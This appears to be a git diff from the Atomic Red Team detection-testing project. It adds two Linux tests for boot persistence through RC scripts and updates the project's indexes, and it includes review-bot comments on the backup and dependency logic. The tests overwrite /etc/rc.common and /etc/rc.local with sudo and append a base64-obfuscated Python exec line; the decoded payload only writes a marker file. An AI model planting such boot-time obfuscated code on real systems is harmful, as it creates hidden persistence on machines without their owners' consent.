.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"te
chniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniq
ueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":
"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 0e530577..fda6082f 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -160,6 +160,8 @@ privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4 privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt privilege-escalation,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash +privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash +privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt 
@@ -536,6 +538,8 @@ persistence,T1547.011,Plist Modification,1,Plist Modification,394a538e-09bb-4a4a persistence,T1547.010,Port Monitors,1,Add Port Monitor persistence in Registry,d34ef297-f178-4462-871e-9ce618d44e50,command_prompt persistence,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell persistence,T1037.004,RC Scripts,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash +persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash +persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash persistence,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual persistence,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh persistence,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index d4e71a68..89eb46ca 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv 
@@ -32,6 +32,8 @@ privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injecti privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash +privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash +privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh 
@@ -157,6 +159,8 @@ persistence,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash +persistence,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash +persistence,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash persistence,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index a9ae5a7c..e7646cfb 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -324,6 +324,8 @@ - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1037.004 RC Scripts](../../T1037.004/T1037.004.md) - Atomic Test #1: rc.common [macos] + - Atomic Test #2: rc.common [linux] + - Atomic Test #3: rc.local [linux] - [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) - Atomic Test #1: Re-Opened Applications [macos] - Atomic Test #2: Re-Opened Applications [macos] 
@@ -967,6 +969,8 @@ - T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1037.004 RC Scripts](../../T1037.004/T1037.004.md) - Atomic Test #1: rc.common [macos] + - Atomic Test #2: rc.common [linux] + - Atomic Test #3: rc.local [linux] - T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md) - Atomic Test #1: Re-Opened Applications [macos] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index d1576879..6499f682 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -122,7 +122,9 @@ - T1055.009 Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1037.004 RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md) + - Atomic Test #2: rc.common [linux] + - Atomic Test #3: rc.local [linux] - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md) - Atomic Test #1: Make and modify binary from C source [macos, linux] 
@@ -451,7 +453,9 @@ - T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1037.004 RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md) + - Atomic Test #2: rc.common [linux] + - Atomic Test #3: rc.local [linux] - T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md index 241437be..420df707 100644 --- a/atomics/Indexes/Matrices/linux-matrix.md +++ b/atomics/Indexes/Matrices/linux-matrix.md 
@@ -23,7 +23,7 @@ | | [Systemd Timers](../../T1053.006/T1053.006.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | Proc Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Keylogging](../../T1056.001/T1056.001.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | | | [Unix Shell](../../T1059.004/T1059.004.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Discovery](../../T1057/T1057.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) 
| External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [RC Scripts](../../T1037.004/T1037.004.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | Network Device Configuration Dump [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A 
TEST](https://atomicredteam.io/contributing) | | | | Implant Internal Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Dynamic Linker Hijacking](../../T1574.006/T1574.006.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | | | | [Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | 
@@ -40,7 +40,7 @@ | | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Indicator Removal on Host [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | -| | | RC Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [RC Scripts](../../T1037.004/T1037.004.md) | | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | | | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 69c30c6a..9500a007 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -15389,6 +15389,48 @@ privilege-escalation: ' elevation_required: true name: bash + - name: rc.common + auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a + description: 'Modify rc.common + +' + supported_platforms: + - linux + executor: + name: bash + elevation_required: true + command: | + filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi + printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common + echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common + sudo chmod +x /etc/rc.common + cleanup_command: 'origfilename=''/etc/rc.common.original'';if [ ! -f $origfilename + ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common + && sudo rm $origfilename;fi + +' + - name: rc.local + auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 + description: 'Modify rc.local + +' + supported_platforms: + - linux + executor: + name: bash + elevation_required: true + command: | + filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi + printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local + echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local + sudo chmod +x /etc/rc.local + cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename + ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && + sudo rm $origfilename;fi + +' T1547.007: technique: created: '2020-01-24T18:15:06.641Z' 
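Review bot: in the `command` block of both new tests, the backup step `sudo cp $filename /etc/rc.common.original` (and its rc.local twin) runs unconditionally whenever the target file exists, so a second run without an intervening cleanup copies the already-modified script over the original backup, and `cleanup_command` then "restores" the test's own content instead of the system's file. Guard the copy with a check such as `[ ! -f /etc/rc.common.original ]` so an existing backup is never overwritten. The `sudo touch $filename` branch is also redundant, because `sudo tee /etc/rc.common` on the next line creates the file either way; the condition then only needs to decide whether a backup is taken.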
@@ -43035,6 +43077,48 @@ persistence: ' elevation_required: true name: bash + - name: rc.common + auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a + description: 'Modify rc.common + +' + supported_platforms: + - linux + executor: + name: bash + elevation_required: true + command: | + filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi + printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common + echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common + sudo chmod +x /etc/rc.common + cleanup_command: 'origfilename=''/etc/rc.common.original'';if [ ! -f $origfilename + ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common + && sudo rm $origfilename;fi + +' + - name: rc.local + auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 + description: 'Modify rc.local + +' + supported_platforms: + - linux + executor: + name: bash + elevation_required: true + command: | + filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi + printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local + echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local + printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local + sudo chmod +x /etc/rc.local + cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename + ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && + sudo rm $origfilename;fi + +' T1542.004: technique: created: '2020-10-20T00:05:48.790Z' 
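Review bot: the executor for both tests is `bash`, but the line appended to the RC script calls `python3 -c ...`, and neither test declares that prerequisite, so on a host without python3 the entry is installed exactly as written and fails silently at the next boot. Add a `dependencies` entry whose prereq check confirms `python3` is on the path, or drop the interpreter altogether and write the marker with a plain shell command, which also removes the need for the base64 wrapping.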
diff --git a/atomics/T1037.004/T1037.004.md b/atomics/T1037.004/T1037.004.md index 994659fb..5e258a38 100644 --- a/atomics/T1037.004/T1037.004.md +++ b/atomics/T1037.004/T1037.004.md @@ -12,6 +12,10 @@ Several Unix-like systems have moved to Systemd and deprecated the use of RC scr - [Atomic Test #1 - rc.common](#atomic-test-1---rccommon) +- [Atomic Test #2 - rc.common](#atomic-test-2---rccommon) + +- [Atomic Test #3 - rc.local](#atomic-test-3---rclocal) +
@@ -38,4 +42,68 @@ sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /e +
+
+ +## Atomic Test #2 - rc.common +Modify rc.common + +**Supported Platforms:** Linux + + + + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +filename='/etc/rc.common';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.common.original;fi +printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common +echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common +printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common +sudo chmod +x /etc/rc.common +``` + +#### Cleanup Commands: +```bash +origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common && sudo rm $origfilename;fi +``` + + + + + +
+
+ +## Atomic Test #3 - rc.local +Modify rc.local + +**Supported Platforms:** Linux + + + + + +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) + + +```bash +filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi +printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local +echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local +printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local +sudo chmod +x /etc/rc.local +``` + +#### Cleanup Commands: +```bash +origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local && sudo rm $origfilename;fi +``` + + + + +
